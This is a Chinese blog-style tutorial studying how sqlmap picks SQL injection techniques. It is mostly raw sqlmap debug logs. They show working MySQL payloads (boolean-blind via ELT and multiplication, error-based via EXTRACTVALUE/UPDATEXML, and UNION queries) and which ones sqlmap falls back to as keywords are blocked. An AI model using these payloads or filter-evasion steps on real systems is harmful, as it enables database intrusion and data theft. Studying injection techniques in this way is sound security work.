'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:11:53] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1530 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: MySQL boolean-based blind - Parameter replace (ELT - original value) Payload: id=ELT(4348=4348,1) Vector: ELT([INFERENCE],[ORIGVALUE])---
禁掉AND,CASE,MAKE_SET,ELT
直接相乘了
[09:16:17] [INFO] checking if the injection point on GET parameter 'id' is a false positive[09:16:17] [PAYLOAD] (66=66)*1[09:16:17] [PAYLOAD] (66=93)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (93=90)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (90=90)*1[09:16:17] [PAYLOAD] (93 90)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (32=32)*1[09:16:17] [PAYLOAD] (32=44)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (44=39)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (39=39)*1[09:16:17] [PAYLOAD] (44 39)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (54=54)*1[09:16:17] [PAYLOAD] (54=99)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (99=89)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (89=89)*1[09:16:18] [PAYLOAD] (99 89)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (29=29)*1[09:16:18] [PAYLOAD] (29=95)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (95=76)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (76=76)*1[09:16:18] [PAYLOAD] (95 76)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (42=42)*1[09:16:18] [PAYLOAD] (42=88)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (88=74)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (74=74)*1[09:16:18] [PAYLOAD] (88 74)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [DEBUG] checking for parameter length constrainting mechanisms[09:16:18] [PAYLOAD] (6948= 6948)*1[09:16:18] [DEBUG] checking for filtered characters[09:16:18] [PAYLOAD] ((2671)=2671)*1[09:16:18] [PAYLOAD] (2672>2671)*1GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:16:18] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1518 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: MySQL boolean-based blind - Parameter replace (bool*int - original value) Payload: id=(9095=9095)*1 Vector: ([INFERENCE])*[ORIGVALUE]---
禁掉AND,CASE,MAKE_SET,ELT,*,就会报错
基于报错型注入(E)
默认情况
extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错select username from security.user where id=1 and (extractvalue(‘anything’,’/x/xx’))
[09:22:46] [PAYLOAD] 1 AND EXTRACTVALUE(7450,CONCAT(0x5c,0x7176627171,(SELECT (CASE WHEN (5241= 5241) THEN 1 ELSE 0 END)),0x71626a6b71))[09:22:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:22:46] [DEBUG] performed 1 queries in 0.12 seconds[09:22:46] [DEBUG] checking for filtered charactersGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:22:46] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 430 HTTP(s) requests:---Parameter: id (GET) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: id=1 AND EXTRACTVALUE(4041,CONCAT(0x5c,0x7176627171,(SELECT (ELT(4041=4041,1))),0x71626a6b71)) Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))---
禁掉AND,就会使用OR
[09:27:36] [PAYLOAD] 1 OR EXTRACTVALUE(6984,CONCAT(0x5c,0x716b7a7171,(SELECT (CASE WHEN (2831= 2831) THEN 1 ELSE 0 END)),0x717a7a7171))[09:27:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:27:36] [DEBUG] performed 1 queries in 0.13 seconds[09:27:36] [DEBUG] checking for filtered charactersGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:27:36] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 483 HTTP(s) requests:---Parameter: id (GET) Type: error-based Title: MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: id=1 OR EXTRACTVALUE(9441,CONCAT(0x5c,0x716b7a7171,(SELECT (ELT(9441=9441,1))),0x717a7a7171)) Vector: OR EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))---
禁掉AND,OR,就会出现updatexml
[09:29:23] [PAYLOAD] (UPDATEXML(9878,CONCAT(0x2e,0x7162716b71,(SELECT (CASE WHEN (8893= 8893) THEN 1 ELSE 0 END)),0x716b6b6271),9352))[09:29:23] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:29:23] [DEBUG] performed 1 queries in 0.16 seconds[09:29:23] [DEBUG] checking for filtered charactersGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:29:23] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:---Parameter: id (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: id=(UPDATEXML(6736,CONCAT(0x2e,0x7162716b71,(SELECT (ELT(6736=6736,1))),0x716b6b6271),8672)) Vector: (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))---[09:29:23] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.1
禁掉AND,OR,UPDATEXML,就会出现EXTRACTVALUE
[09:31:15] [PAYLOAD] (EXTRACTVALUE(1250,CONCAT(0x5c,0x7171627671,(SELECT (CASE WHEN (9342= 9342) THEN 1 ELSE 0 END)),0x716b6b6271)))[09:31:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:31:15] [DEBUG] performed 1 queries in 0.18 seconds[09:31:15] [DEBUG] checking for filtered charactersGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:31:15] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 839 HTTP(s) requests:---Parameter: id (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE) Payload: id=(EXTRACTVALUE(3610,CONCAT(0x5c,0x7171627671,(SELECT (ELT(3610=3610,1))),0x716b6b6271))) Vector: (EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))---
禁掉AND,OR,UPDATEXML,EXTRACTVALUE,就会失败
联合查询(U)
默认情况
[09:37:07] [INFO] checking if the injection point on GET parameter 'id' is a false positive[09:37:07] [PAYLOAD] -1466 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=17) THEN 1 ELSE 0 END),0x7162717671)-- hZgY[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -6665 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=24) THEN 1 ELSE 0 END),0x7162717671)-- YsNa[09:37:07] [DEBUG] performed 1 queries in 0.02 seconds[09:37:07] [PAYLOAD] -4215 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=51) THEN 1 ELSE 0 END),0x7162717671)-- ejrD[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -8306 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (51=24) THEN 1 ELSE 0 END),0x7162717671)-- yobT[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -8304 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (24=24) THEN 1 ELSE 0 END),0x7162717671)-- Gyxy[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -4122 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (51 24) THEN 1 ELSE 0 END),0x7162717671)-- zULK[09:37:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:37:07] [DEBUG] performed 1 queries in 0.14 seconds[09:37:07] [PAYLOAD] -2502 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (47=47) THEN 1 ELSE 0 END),0x7162717671)-- QCrG[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -9061 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (47=70) THEN 1 ELSE 0 END),0x7162717671)-- SJaU[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -4383 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (47=95) THEN 1 ELSE 0 END),0x7162717671)-- ailf[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -4171 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (95=70) THEN 1 ELSE 0 END),0x7162717671)-- TkVB[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -1142 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (70=70) THEN 1 ELSE 0 END),0x7162717671)-- YlcG[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -8375 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (95 70) THEN 1 ELSE 0 END),0x7162717671)-- Ijdy[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:37:08] [DEBUG] performed 1 queries in 0.15 seconds[09:37:08] [PAYLOAD] -4934 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (25=25) THEN 1 ELSE 0 END),0x7162717671)-- IYqW[09:37:08] [DEBUG] performed 1 queries in 0.02 seconds[09:37:08] [PAYLOAD] -1613 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (25=31) THEN 1 ELSE 0 END),0x7162717671)-- lFQL[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -2297 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (25=63) THEN 1 ELSE 0 END),0x7162717671)-- Koxh[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -3230 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (63=31) THEN 1 ELSE 0 END),0x7162717671)-- DFuT[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -4541 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (31=31) THEN 1 ELSE 0 END),0x7162717671)-- wbyE[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -4571 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (63 31) THEN 1 ELSE 0 END),0x7162717671)-- RoAK[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:37:08] [DEBUG] performed 1 queries in 0.13 seconds[09:37:08] [PAYLOAD] -4255 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (12=12) THEN 1 ELSE 0 END),0x7162717671)-- HeVB[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -2162 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (12=59) THEN 1 ELSE 0 END),0x7162717671)-- UdBM[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -3636 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (12=85) THEN 1 ELSE 0 END),0x7162717671)-- quEm[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -9996 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (85=59) THEN 1 ELSE 0 END),0x7162717671)-- tmiF[09:37:08] [DEBUG] performed 1 queries in 0.03 seconds[09:37:08] [PAYLOAD] -1861 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (59=59) THEN 1 ELSE 0 END),0x7162717671)-- dZZv[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -2005 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (85 59) THEN 1 ELSE 0 END),0x7162717671)-- OulK[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:37:08] [DEBUG] performed 1 queries in 0.11 seconds[09:37:08] [PAYLOAD] -2028 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (26=26) THEN 1 ELSE 0 END),0x7162717671)-- iRZQ[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -2447 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (26=39) THEN 1 ELSE 0 END),0x7162717671)-- IPSM[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -8785 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (26=83) THEN 1 ELSE 0 END),0x7162717671)-- cbzQ[09:37:08] [DEBUG] performed 1 queries in 0.02 seconds[09:37:08] [PAYLOAD] -2637 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (83=39) THEN 1 ELSE 0 END),0x7162717671)-- wwBL[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -8945 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (39=39) THEN 1 ELSE 0 END),0x7162717671)-- qohR[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -2184 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (83 39) THEN 1 ELSE 0 END),0x7162717671)-- vJmq[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:37:08] [DEBUG] performed 1 queries in 0.13 seconds[09:37:08] [DEBUG] checking for parameter length constrainting mechanisms[09:37:08] [PAYLOAD] -6805 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (6024= 6024) THEN 1 ELSE 0 END),0x7162717671)-- aqzt[09:37:08] [DEBUG] performed 1 queries in 0.02 seconds[09:37:08] [DEBUG] checking for filtered charactersGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:37:08] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 87 HTTP(s) requests:---Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: id=-1722 UNION ALL SELECT NULL,CONCAT(0x71787a7671,0x417a6144526d48684971744f484c49585966416b4b66736851446c6d53787a63446b41705a715747,0x7162717671)-- Nyot Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT]---
禁掉union,就会报错
禁掉SELECT,也会报错
禁掉CONCAT,也会失败
禁掉CASE
关于如何研究sqlmap使用的注入技术就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
文章标题:如何研究sqlmap使用的注入技术,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/24740
微信扫一扫 
支付宝扫一扫 
